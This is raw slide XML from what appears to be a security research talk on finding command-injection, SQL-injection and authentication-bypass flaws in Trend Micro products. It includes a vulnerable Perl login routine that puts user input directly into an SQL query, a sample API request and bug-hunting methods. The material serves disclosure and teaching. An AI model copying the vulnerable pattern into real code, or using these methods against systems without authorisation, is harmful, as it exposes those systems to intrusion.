            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Lots </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>of Perl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="is-IS" dirty="0" smtClean="0"/>
              <a:t> code, not our favourite language!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="is-IS" dirty="0" smtClean="0"/>
              <a:t>How many vulnerabilities?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="is-IS" b="1" dirty="0" smtClean="0"/>
              <a:t>20 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="is-IS" dirty="0" smtClean="0"/>
              <a:t>x </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="is-IS" dirty="0" smtClean="0"/>
              <a:t>Command Injection vulnerabilities discovered, using a similar pattern to the one patched by Trend Micro themselves</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SQL Injection in the authentication, which was silently patched by Trend Micro!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Allows an attacker to bypass the authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="is-I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did we pick this target?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Because another researcher found a Code Injection in it and we have never tested Perl. It could be fun we said</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="is-IS" smtClean="0"/>
              <a:t>…</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="is-IS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5" t="43680"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2043423" y="3395251"/>
            <a:ext cx="8101980" cy="28087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9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approach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Low hanging </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>fruit and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>most </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>critical </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>vulnerability  classes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>OS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>command </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>injections and/or vulnerabilities that result in code execution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Weaknesses in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>frameworks</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Authentication </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>bypass</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Focus </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>during vulnerability discovery phase:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Reverse </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>engineering of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>binaries and </a:t>
            </a:r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Source code/scripts extraction and analysis</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Discern third-party </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>components from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Trend Micro </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>code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5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vulnerabilities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Look at the vulnerable code pattern, and try to find every instance</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="is-I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is-I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3" y="2780928"/>
            <a:ext cx="10045700" cy="2971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Hunting for vulnerabilities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$reqdata is our input</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="is-IS" dirty="0" smtClean="0"/>
              <a:t>… easy to grep the code for “system(“ !</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="is-I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is-I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492896"/>
            <a:ext cx="11285796" cy="33166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vulnerabilities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Also, since we were tracing $reqdata as input, we found multiple SQL Injections while we were at it. However, most were parameterized</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The permissions on the database were strict, we couldn't leverage it for anything more than information disclosure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endParaRPr lang="is-IS" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="is-IS" dirty="0" smtClean="0"/>
              <a:t>As it turns out, information disclosure was just what we needed...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="is-I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is-I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861048"/>
            <a:ext cx="10223803" cy="7920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_get_user_hpassword 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96" y="1905000"/>
            <a:ext cx="11089232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Controller/api/auth.pm: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sub login_PUT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my ( $self, $c ) = @_;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$c-&gt;model('DBI')-&gt;dbh()-&gt;{mysql_auto_reconnect} = 1;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my $username = $c-&gt;req-&gt;data-&gt;{username};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my $user = Storage::User-&gt;new($username, 'osdp');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my $hpassword_expect = _get_user_hpassword(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$username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endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="is-I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8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_get_user_hpassword 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96" y="1905000"/>
            <a:ext cx="11089232" cy="4267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s-IS">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>sub _get_user_hpassword {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>    my $dbh        = Storage::DB-&gt;dbh( { db =&gt; 'osdp' } );</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS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is-IS" b="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>my $admin_name = shift;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>    my $sql        = qq{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>            SELECT DISTINCT hpassword</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>            FROM users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>            WHERE login_name </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="is-IS" smtClean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is-IS" b="1" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>'$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="is-IS" b="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>admin_name'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="is-IS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r>
              <a:rPr lang="is-IS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>
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="is-IS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>
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>    my ($user_password) = $dbh-&gt;selectrow_array(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="is-IS" b="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>$sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="is-IS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 smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="is-IS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_get_user_hpassword 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96" y="1905000"/>
            <a:ext cx="11089232" cy="4267200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="is-IS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4" y="2060848"/>
            <a:ext cx="11347284" cy="32502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2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Results</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/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185167"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="848116" y="1700808"/>
          <a:ext cx="10492593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research </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>is still going on:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Total </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>products </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>tested so far: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>11</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Average number of vulnerabilities per product: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>~24</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Remote Code Execution </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>vulnerabilities so far: 236</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>In all targets we tested, we found a way to gain remote code execution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>At least 2 failed patches:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>1 patch introduced a vulnerability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>1 patch failed to patch adequately</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>In only 1 product was the database permissions correct, denying access to the underlying operating system from an SQL Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>InterScan had the highest number of code injection vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Code review and/or reverse engineering was required for all targets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3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Trend Micro</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The Zero Day Initiative</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Hack in The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Box</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Offensive Security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>motivators</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: @</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>aloria</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, @</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>quine, @Qkaiser, @korprit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>and @rgod777 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945" y="-98642"/>
            <a:ext cx="9144000" cy="2667000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Come and train with us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3553134"/>
            <a:ext cx="9127113" cy="2627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1629726"/>
            <a:ext cx="4704430" cy="15600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u="sng" dirty="0" smtClean="0"/>
              <a:t>Malware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>analysis </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>approach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Study </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>the binary, its behavior, components, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>communication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Understand </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>who starts communication first </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>agent or server?)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Studying </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>of the packets exchanged and the protocol format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Mapping </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>of each action </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>to network traffic observed </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>via API </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>hooking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16" y="1700808"/>
            <a:ext cx="3240360" cy="35522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5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ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>Steven Seeley (mr_me) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>@steventseeley</a:t>
            </a:r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  <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://srcincite.io</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:ea typeface="Courier New" charset="0"/>
              <a:cs typeface="Courier New" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>Roberto Suggi Liverani (malerisch) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>@malerisch</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:ea typeface="Courier New" charset="0"/>
              <a:cs typeface="Courier New" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>http://blog.malerisch.net</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:ea typeface="Courier New" charset="0"/>
              <a:cs typeface="Courier New" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"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1937014"/>
            <a:ext cx="5276725" cy="3382516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https://qkaiser.github.io/pentesting/trendmicro/2016/08/08/trendmicro-sps/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https://qkaiser.github.io/pentesting/trendmicro/2016/09/06/trendmicro-safesync/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twitter.com/cogitoergor00t/status/771768758289494016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twitter.com/korprit/status/758356923779461120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www.youtube.com/watch?v=KWfIgq3iZ8A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www.youtube.com/watch?v=9-906rJ2HXA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asciinema.org/a/112568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asciinema.org/a/112563</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty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asciinema.org/a/112567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1" y="1844824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Looking for front-end </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" u="sng" dirty="0" smtClean="0"/>
              <a:t>patterns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098" name="Picture 2" descr="https://www.productmanagerhq.com/wp-content/uploads/2014/08/Pattern-Recogni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1756683"/>
            <a:ext cx="2842493" cy="21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972612" y="5517232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83972" y="2544559"/>
            <a:ext cx="1152128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POST /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2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singlepointAPI.dll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[target]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Content-Type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application/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Connection: close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2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method_name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get_object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24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b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name":"test","objectId":"3"}}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3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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" u="sng" dirty="0" smtClean="0"/>
              <a:t>patterns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Search JavaScript for strings to build the (XHR) requests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Write a custom web scanner that will perform the following actions:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="960120" lvl="2" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>F</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>ind </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>all </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>operations </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>their associated parameters in the JavaScript code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="960120" lvl="2" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Build base requests</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="960120" lvl="2" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Execute base requests and look for a specific status code and/or string</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="960120" lvl="2" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>If interesting request, feed Burp web proxy and manually check presence of vulnerability/behavior</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="960120" lvl="2" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>If vulnerability found, re-use parameters and values across other identified attack patterns</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"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 behind the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" u="sng" dirty="0" smtClean="0"/>
              <a:t>scenes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Using this approach, we found </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>80</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>+ exploitable </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Remote Code Execution vulnerabilities in a single target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Approach used against different Trend Micro targets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smtClean="0"/>
              <a:t>not </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ALL operations can be found from the web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Search the binaries for operations that are not triggered via the web application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="hr-HR" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"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074" name="Picture 2" descr="https://mattmulcahey.files.wordpress.com/2014/02/robocop-6-archiv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1905000"/>
            <a:ext cx="2975137" cy="20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8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We</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0" err="1" smtClean="0"/>
              <a:t>found</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0" err="1" smtClean="0"/>
              <a:t>functions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0" err="1" smtClean="0"/>
              <a:t>that</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>were</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>unlikely</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" b="1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to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0" err="1" smtClean="0"/>
              <a:t>have</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0" err="1" smtClean="0"/>
              <a:t>been</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0" err="1" smtClean="0"/>
              <a:t>tested</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0" smtClean="0"/>
              <a:t> for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0" err="1" smtClean="0"/>
              <a:t>security</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0" err="1" smtClean="0"/>
              <a:t>vulnerabilities</a:t>
            </a:r>
            <a:endParaRPr lang="hr-HR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>strings</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t> *.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0" smtClean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hr-HR" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>grep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t> -v '@\|;\|#\|&amp;\|%\|\\$\|=\|?\|(\|)\|!\|\"\|:\|-\|&gt;\|\.\|[0-9]\|[A-Z]\|^_\|\s\|\\' | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0" err="1" smtClean="0">
